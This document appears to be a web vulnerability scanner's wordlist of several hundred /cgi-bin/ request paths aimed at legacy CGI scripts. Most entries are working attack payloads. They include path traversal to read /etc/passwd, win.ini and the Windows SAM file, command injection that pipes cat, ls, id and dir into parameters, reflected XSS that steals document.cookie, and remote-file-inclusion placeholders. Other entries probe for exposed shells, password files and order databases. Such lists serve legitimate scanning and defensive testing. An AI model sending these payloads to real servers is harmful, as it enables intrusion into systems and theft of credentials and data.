/cgi-bin/%2e%2e/abyss.conf
/cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin/.access
/cgi-bin/.cobalt
/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
/cgi-bin/.fhp
/cgi-bin/.htaccess
/cgi-bin/.htaccess.old
/cgi-bin/.htaccess.save
/cgi-bin/.htaccess~
/cgi-bin/.htpasswd
/cgi-bin/.nsconfig
/cgi-bin/.passwd
/cgi-bin/.www_acl
/cgi-bin/.wwwacl
/cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
/cgi-bin//_vti_pvt/doctodep.btr
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/AnyBoard.cgi
/cgi-bin/AnyForm
/cgi-bin/AnyForm2
/cgi-bin/Backup/add-passwd.cgi
/cgi-bin/C
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/DC
/cgi-bin/DCFORM
/cgi-bin/File
/cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40google.com&redirect=http%3A%2F%2Fgoogle.com&recipient=sq%40google.com
/cgi-bin/FormMail.cgi?<script>alert(\
/cgi-bin/FormMail.pl
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GWWEB.EXE?HELP=bad-request
/cgi-bin/ImageFolio/admin/admin.cgi
/cgi-bin/LWGate
/cgi-bin/LWGate.cgi
/cgi-bin/MsmMask.exe
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin/Pbcgi.exe
/cgi-bin/Upload.pl
/cgi-bin/Vs
/cgi-bin/W
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@google.com%20|%20dir%20c:\\
/cgi-bin/Webnews.exe
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
/cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
/cgi-bin/add_ftp.cgi
/cgi-bin/addbanner.cgi
/cgi-bin/adduser.cgi
/cgi-bin/admin.cgi
/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
/cgi-bin/admin.php
/cgi-bin/admin.php3
/cgi-bin/admin.pl
/cgi-bin/adminhot.cgi
/cgi-bin/adminwww.cgi
/cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/cgi-bin/aglimpse
/cgi-bin/aglimpse.cgi
/cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
/cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/cgi-bin/amadmin.pl
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
/cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
/cgi-bin/anyboard.cgi
/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/architext_query.pl
/cgi-bin/ash
/cgi-bin/astrocam.cgi
/cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
/cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
/cgi-bin/auction/auction.cgi?action=
/cgi-bin/auctiondeluxe/auction.pl
/cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgi-bin/auth_data/auth_user_file.txt
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/awstats.pl
/cgi-bin/awstats/awstats.pl
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/axs.cgi
/cgi-bin/badmin.cgi
/cgi-bin/banner.cgi
/cgi-bin/bannereditor.cgi
/cgi-bin/bash
/cgi-bin/bb-hist?HI
/cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/cgi-bin/bbs_forum.cgi
/cgi-bin/betsie/parserl.pl/<script>alert('XSS')</script>;
/cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
/cgi-bin/bizdb1-search.cgi
/cgi-bin/blog/
/cgi-bin/blog/mt-check.cgi
/cgi-bin/blog/mt-load.cgi
/cgi-bin/blog/mt.cfg
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/boozt/admin/index.cgi?section=5&input=1
/cgi-bin/bsguest.cgi?email=x;ls
/cgi-bin/bslist.cgi?email=x;ls
/cgi-bin/build.cgi
/cgi-bin/bulk/bulk.cgi
/cgi-bin/c32web.exe/ChangeAdminPassword
/cgi-bin/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
/cgi-bin/c_download.cgi
/cgi-bin/cached_feed.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
/cgi-bin/calendar
/cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/cgi-bin/calendar.pl
/cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
/cgi-bin/calendar/index.cgi
/cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
/cgi-bin/calender_admin.pl
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cgi-bin/cart.pl
/cgi-bin/cart.pl?db='
/cgi-bin/cart32.exe
/cgi-bin/cartmanager.cgi
/cgi-bin/cbmc/forums.cgi
/cgi-bin/ccbill-local.cgi?cmd=MENU
/cgi-bin/ccbill-local.pl?cmd=MENU
/cgi-bin/cfgwiz.exe
/cgi-bin/cgforum.cgi
/cgi-bin/cgi-lib.pl
/cgi-bin/cgicso?query=<script>alert('XSS')</script>
/cgi-bin/cgicso?query=AAA
/cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
/cgi-bin/cgimail.exe
/cgi-bin/cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/cgiwrap/%3Cfont%20color=red%3E
/cgi-bin/cgiwrap/~@U
/cgi-bin/cgiwrap/~JUNK(5)
/cgi-bin/cgiwrap/~root
/cgi-bin/change-your-password.pl
/cgi-bin/classified.cgi
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/classifieds/classifieds.cgi
/cgi-bin/classifieds/index.cgi
/cgi-bin/clickcount.pl?view=test
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe?/c+dir
/cgi-bin/cmd1.exe?/c+dir
/cgi-bin/code.php
/cgi-bin/code.php3
/cgi-bin/com5..........................................................................................................................................................................................................................box
/cgi-bin/com5.java
/cgi-bin/com5.pl
/cgi-bin/commandit.cgi
/cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
/cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
/cgi-bin/common/listrec.pl
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgi-bin/compatible.cgi
/cgi-bin/count.cgi
/cgi-bin/counter-ord
/cgi-bin/counterbanner
/cgi-bin/counterbanner-ord
/cgi-bin/counterfiglet-ord
/cgi-bin/counterfiglet/nc/
/cgi-bin/cs
/cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csLive
/cgi-bin/csNews.cgi
/cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csPassword.cgi
/cgi-bin/csPassword/csPassword.cgi
/cgi-bin/csh
/cgi-bin/cstat.pl
/cgi-bin/cutecast/members/
/cgi-bin/cvsblame.cgi?file=<script>alert('XSS')</script>
/cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
/cgi-bin/cvslog.cgi?file=<script>alert('XSS')</script>
/cgi-bin/cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
/cgi-bin/cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
/cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/data/fetch.php?page=
/cgi-bin/date
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/db2www/library/document.d2w/show
/cgi-bin/db4web_c/dbdirname//etc/passwd
/cgi-bin/db_manager.cgi
/cgi-bin/dbman/db.cgi?db=no-db
/cgi-bin/dbmlparser.exe
/cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
/cgi-bin/dcshop/auth_data/auth_user_file.txt
/cgi-bin/dcshop/orders/orders.txt
/cgi-bin/dfire.cgi
/cgi-bin/diagnose.cgi
/cgi-bin/dig.cgi
/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
/cgi-bin/displayTC.pl
/cgi-bin/dnewsweb
/cgi-bin/donothing
/cgi-bin/dose.pl?daily&somefile.txt&|ls|
/cgi-bin/download.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/echo.bat
/cgi-bin/echo.bat?&dir+c:\\
/cgi-bin/edit.pl
/cgi-bin/empower?DB=whateverwhatever
/cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/enter.cgi
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
/cgi-bin/erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
/cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
/cgi-bin/ex-logger.pl
/cgi-bin/excite
/cgi-bin/excite;IF
/cgi-bin/ezadmin.cgi
/cgi-bin/ezboard.cgi
/cgi-bin/ezman.cgi
/cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
/cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
/cgi-bin/ezshopper2/loadpage.cgi
/cgi-bin/ezshopper3/loadpage.cgi
/cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
/cgi-bin/faxsurvey?cat%20/etc/passwd
/cgi-bin/filemail
/cgi-bin/filemail.pl
/cgi-bin/finger
/cgi-bin/finger.pl
/cgi-bin/flexform
/cgi-bin/flexform.cgi
/cgi-bin/fom.cgi?file=<script>alert('XSS')</script>
/cgi-bin/fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
/cgi-bin/formmail
/cgi-bin/formmail.cgi
/cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/formmail.pl
/cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/fortune
/cgi-bin/foxweb.dll
/cgi-bin/foxweb.exe
/cgi-bin/fpsrvadm.exe
/cgi-bin/ftp.pl
/cgi-bin/ftpsh
/cgi-bin/gH.cgi
/cgi-bin/gbadmin.cgi?action=change_adminpass
/cgi-bin/gbadmin.cgi?action=change_automail
/cgi-bin/gbadmin.cgi?action=colors
/cgi-bin/gbadmin.cgi?action=setup
/cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/gbpass.pl
/cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
/cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
/cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
/cgi-bin/get32.exe
/cgi-bin/getdoc.cgi
/cgi-bin/gettransbitmap
/cgi-bin/glimpse
/cgi-bin/gm-authors.cgi
/cgi-bin/gm-cplog.cgi
/cgi-bin/gm.cgi
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
/cgi-bin/guestbook.pl
/cgi-bin/guestbook/passwd
/cgi-bin/handler.cgi
/cgi-bin/hello.bat?&dir+c:\\
/cgi-bin/hitview.cgi
/cgi-bin/horde/test.php
/cgi-bin/horde/test.php?mode=phpinfo
/cgi-bin/hpnst.exe?c=p+i=
/cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
/cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
/cgi-bin/htimage.exe
/cgi-bin/htimage.exe/path/filename?2,2
/cgi-bin/html2chtml.cgi
/cgi-bin/html2wml.cgi
/cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
/cgi-bin/htsearch?-c/nonexistant
/cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
/cgi-bin/htsearch?exclude=%60/etc/passwd%60
/cgi-bin/ibill.pm
/cgi-bin/icat
/cgi-bin/if/admin/nph-build.cgi
/cgi-bin/ikonboard/help.cgi?
/cgi-bin/imageFolio.cgi
/cgi-bin/imagefolio/admin/admin.cgi
/cgi-bin/imagemap
/cgi-bin/imagemap.exe
/cgi-bin/include/new-visitor.inc.php
/cgi-bin/index.js0x70
/cgi-bin/index.pl
/cgi-bin/info2www
/cgi-bin/info2www '(../../../../../../../bin/mail root </etc/passwd>
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/cgi-bin/input2.bat?|dir
/cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
/cgi-bin/ion-p?page=../../../../../etc/passwd
/cgi-bin/jailshell
/cgi-bin/jj
/cgi-bin/journal.cgi?folder=journal.cgi%00
/cgi-bin/ksh
/cgi-bin/lastlines.cgi?process
/cgi-bin/listrec.pl
/cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
/cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/cgi-bin/log-reader.cgi
/cgi-bin/log/
/cgi-bin/log/nether-log.pl?checkit
/cgi-bin/login.cgi
/cgi-bin/login.pl
/cgi-bin/login.pl?course_id=\
/cgi-bin/logit.cgi
/cgi-bin/logs.pl
/cgi-bin/logs/
/cgi-bin/logs/access_log
/cgi-bin/logs/error_log
/cgi-bin/lookwho.cgi
/cgi-bin/ls
/cgi-bin/lwgate
/cgi-bin/lwgate.cgi
/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd
/cgi-bin/mail
/cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
/cgi-bin/mailform.exe
/cgi-bin/mailit.pl
/cgi-bin/maillist.cgi
/cgi-bin/maillist.pl
/cgi-bin/mailnews.cgi
/cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
/cgi-bin/majordomo.pl
/cgi-bin/man2html
/cgi-bin/mastergate/search.cgi?search=0&search_on=all
/cgi-bin/meta.pl
/cgi-bin/mgrqcgi
/cgi-bin/mini_logger.cgi
/cgi-bin/minimal.exe
/cgi-bin/mkilog.exe
/cgi-bin/mkplog.exe
/cgi-bin/mmstdod.cgi
/cgi-bin/moin.cgi?test
/cgi-bin/mojo/mojo.cgi
/cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/mrtg.cgi?cfg=blah
/cgi-bin/ms_proxy_auth_query/
/cgi-bin/mt-static/
/cgi-bin/mt-static/mt-check.cgi
/cgi-bin/mt-static/mt-load.cgi
/cgi-bin/mt-static/mt.cfg
/cgi-bin/mt/
/cgi-bin/mt/mt-check.cgi
/cgi-bin/mt/mt-load.cgi
/cgi-bin/mt/mt.cfg
/cgi-bin/multihtml.pl?multi=/etc/passwd%00html
/cgi-bin/musicqueue.cgi
/cgi-bin/myguestbook.cgi?action=view
/cgi-bin/namazu.cgi
/cgi-bin/nbmember.cgi?cmd=list_all_users
/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
/cgi-bin/netpad.cgi
/cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
/cgi-bin/nimages.php
/cgi-bin/nlog-smb.cgi
/cgi-bin/nlog-smb.pl
/cgi-bin/non-existent.pl
/cgi-bin/noshell
/cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/nph-error.pl
/cgi-bin/nph-exploitscanget.cgi
/cgi-bin/nph-maillist.pl
/cgi-bin/nph-publish
/cgi-bin/nph-publish.cgi
/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
/cgi-bin/nph-test-cgi
/cgi-bin/ntitar.pl
/cgi-bin/opendir.php?/etc/passwd
/cgi-bin/orders/orders.txt
/cgi-bin/pagelog.cgi
/cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
/cgi-bin/parse-file
/cgi-bin/pass
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3C
/cgi-bin/perl
/cgi-bin/perl.exe
/cgi-bin/perl.exe?-v
/cgi-bin/perl?-v
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
/cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
/cgi-bin/phf
/cgi-bin/phf.cgi?QALIA
/cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
/cgi-bin/photo/
/cgi-bin/photo/manage.cgi
/cgi-bin/photo/protected/manage.cgi
/cgi-bin/php-cgi
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/plusmail
/cgi-bin/pollit/Poll_It_
/cgi-bin/pollssi.cgi
/cgi-bin/post-query
/cgi-bin/post16.exe
/cgi-bin/post32.exe|dir%20c:\\
/cgi-bin/post_query
/cgi-bin/postcards.cgi
/cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
/cgi-bin/ppdscgi.exe
/cgi-bin/printenv
/cgi-bin/printenv.tmp
/cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
/cgi-bin/processit.pl
/cgi-bin/profile.cgi
/cgi-bin/pu3.pl
/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
/cgi-bin/query
/cgi-bin/query?mss=%2e%2e/config
/cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
/cgi-bin/quikstore.cfg
/cgi-bin/quizme.cgi
/cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
/cgi-bin/ratlog.cgi
/cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
/cgi-bin/redirect
/cgi-bin/register.cgi
/cgi-bin/replicator/webpage.cgi/
/cgi-bin/responder.cgi
/cgi-bin/retrieve_password.pl
/cgi-bin/rguest.exe
/cgi-bin/rightfax/fuwww.dll/?
/cgi-bin/rksh
/cgi-bin/rmp_query
/cgi-bin/robadmin.cgi
/cgi-bin/robpoll.cgi
/cgi-bin/rpm_query
/cgi-bin/rsh
/cgi-bin/rtm.log
/cgi-bin/rwcgi60
/cgi-bin/rwcgi60/showenv
/cgi-bin/rwwwshell.pl
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/cgi-bin/sawmill?rfcf+%22
/cgi-bin/sbcgi/sitebuilder.cgi
/cgi-bin/scoadminreg.cgi
/cgi-bin/scripts/*%0a.pl
/cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
/cgi-bin/search.cgi
/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
/cgi-bin/search.pl
/cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
/cgi-bin/sendform.cgi
/cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
/cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
/cgi-bin/sensepost.exe?/c+dir
/cgi-bin/session/adminlogin
/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
/cgi-bin/sh
/cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
/cgi-bin/shop.pl/page=;cat%20shop.pl|
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/orders/orders.txt
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
/cgi-bin/shopplus.cgi?dn=google.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
/cgi-bin/show.pl
/cgi-bin/showcheckins.cgi?person=<script>alert('XSS')</script>
/cgi-bin/showuser.cgi
/cgi-bin/shtml.dll
/cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
/cgi-bin/simplestguest.cgi
/cgi-bin/simplestmail.cgi
/cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
/cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
/cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
/cgi-bin/spin_client.cgi?aaaaaaaa
/cgi-bin/ss
/cgi-bin/sscd_suncourier.pl
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
/cgi-bin/stat.pl
/cgi-bin/stat/
/cgi-bin/stats-bin-p/reports/index.html
/cgi-bin/stats.pl
/cgi-bin/stats.prf
/cgi-bin/stats/
/cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
/cgi-bin/stats_old/
/cgi-bin/statsconfig
/cgi-bin/statusconfig.pl
/cgi-bin/statview.pl
/cgi-bin/store.cgi?
/cgi-bin/store/agora.cgi?cart_id=<script>alert('XSS')</script>
/cgi-bin/store/agora.cgi?page=whatever33.html
/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
/cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
/cgi-bin/survey
/cgi-bin/survey.cgi
/cgi-bin/sws/admin.html
/cgi-bin/sws/manager.pl
/cgi-bin/tablebuild.pl
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/tcsh
/cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
/cgi-bin/test-cgi.bat
/cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
/cgi-bin/test-cgi.tcl
/cgi-bin/test-cgi?/*
/cgi-bin/test-env
/cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/cgi-bin/test.cgi
/cgi-bin/test/test.cgi
/cgi-bin/testcgi.exe
/cgi-bin/testcgi.exe
/cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
/cgi-bin/texis.exe/junk
/cgi-bin/texis/junk
/cgi-bin/texis/phine
/cgi-bin/textcounter.pl
/cgi-bin/tidfinder.cgi
/cgi-bin/tigvote.cgi
/cgi-bin/title.cgi
/cgi-bin/tpgnrock
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/troops.cgi
/cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
/cgi-bin/ultraboard.cgi
/cgi-bin/ultraboard.pl
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/update.dpgs
/cgi-bin/upload.cgi
/cgi-bin/uptime
/cgi-bin/urlcount.cgi?%3CIMG%20
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/cgi-bin/utm/admin
/cgi-bin/utm/utm_stat
/cgi-bin/view-source
/cgi-bin/view-source?view-source
/cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
/cgi-bin/viewlogs.pl
/cgi-bin/viewsource?/etc/passwd
/cgi-bin/viralator.cgi
/cgi-bin/virgil.cgi
/cgi-bin/visadmin.exe
/cgi-bin/visitor.exe
/cgi-bin/vote.cgi
/cgi-bin/vpasswd.cgi
/cgi-bin/vq/demos/respond.pl?<script>alert('XSS')</script>
/cgi-bin/w3-msql
/cgi-bin/w3-sql
/cgi-bin/wais.pl
/cgi-bin/way-board.cgi?db=/etc/passwd%00
/cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
/cgi-bin/wconsole.dll
/cgi-bin/webais
/cgi-bin/webbbs.cgi
/cgi-bin/webbbs.exe
/cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@google.com&body=aaaaffff&followup=10;cat%20/etc/passwd
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
/cgi-bin/webdriver
/cgi-bin/webfind.exe?keywords=01234567890123456789
/cgi-bin/webgais
/cgi-bin/webif.cgi
/cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/webmap.cgi
/cgi-bin/webnews.pl
/cgi-bin/webplus.exe?about
/cgi-bin/webplus?about
/cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
/cgi-bin/websendmail
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
/cgi-bin/webutil.pl
/cgi-bin/webutils.pl
/cgi-bin/webwho.pl
/cgi-bin/wguest.exe
/cgi-bin/where.pl?sd=ls%20/etc
/cgi-bin/whois.cgi?action=load&whois=%3Bid
/cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
/cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/cgi-bin/windmail
/cgi-bin/windmail.exe
/cgi-bin/wrap
/cgi-bin/wrap.cgi
/cgi-bin/ws_ftp.ini
/cgi-bin/www-sql
